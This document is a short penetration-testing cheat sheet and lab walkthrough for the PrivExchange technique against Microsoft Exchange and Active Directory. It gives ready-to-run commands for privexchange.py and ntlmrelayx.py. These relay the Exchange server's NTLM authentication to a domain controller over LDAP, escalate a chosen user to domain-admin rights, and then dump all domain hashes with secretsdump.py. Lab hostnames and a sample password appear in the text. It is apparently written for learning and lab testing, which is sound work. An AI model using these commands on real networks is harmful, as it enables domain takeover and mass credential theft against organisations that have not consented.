PrivExchange

Good Resources to follow

Abusing Exchange with a credential

$ python3 privexchange.py -ah <My Internal IP> <Mail Domain Here> -u <Target Username> -d <domain name>

$ python3 ntlmrelayx.py -t ldap://<FQDN of DC here> --escalate-user <Target Username>

Walkthrough

PrivExchange takes advantage of the fact that Exchange servers are over-permissioned by default. This was discovered by Dirkjann a little over a month ago and is now an excellent way of quickly escalating privileges. It works by querying the Exchange server, getting a response back that contains the Exchange server’s credentials, then relaying the credentials in the response to the Domain Controller via ntlmrelayx, then modifying a user’s privileges so they can dump the hashes on the domain controller. Setting this up was kind of a pain. Exchange 2013 is installed using the default methods on a Windows 2012 R2 server, and I made this modification to the PrivExchange python script to get it to work without a valid SSL certificate. After that, it ran fine. First, start ntlmrelayx.py and point it to a DC, authenticate via LDAP and escalate privileges for a user.

$ python3 ntlmrelayx.py -t ldap:// --escalate-user

Then, run privexchange.py by passing in your attacker IP (-ah), the target, and user/password/domain.

$ python privexchange.py -ah 192.168.218.129 LAB2012DC02.lab.local -u rsmith -d lab.local -p Winter201

Privexchange.py makes the API call to the exchange. If the permissions are set correctly, we can escalate the targeted user to have DA privs. NTLM relays the servers creds to the master DC, then escalates <test user> privs.

We can then use secretsdump.py to dump the hashes on the DC!

$ secretsdump.py /@ -just-dc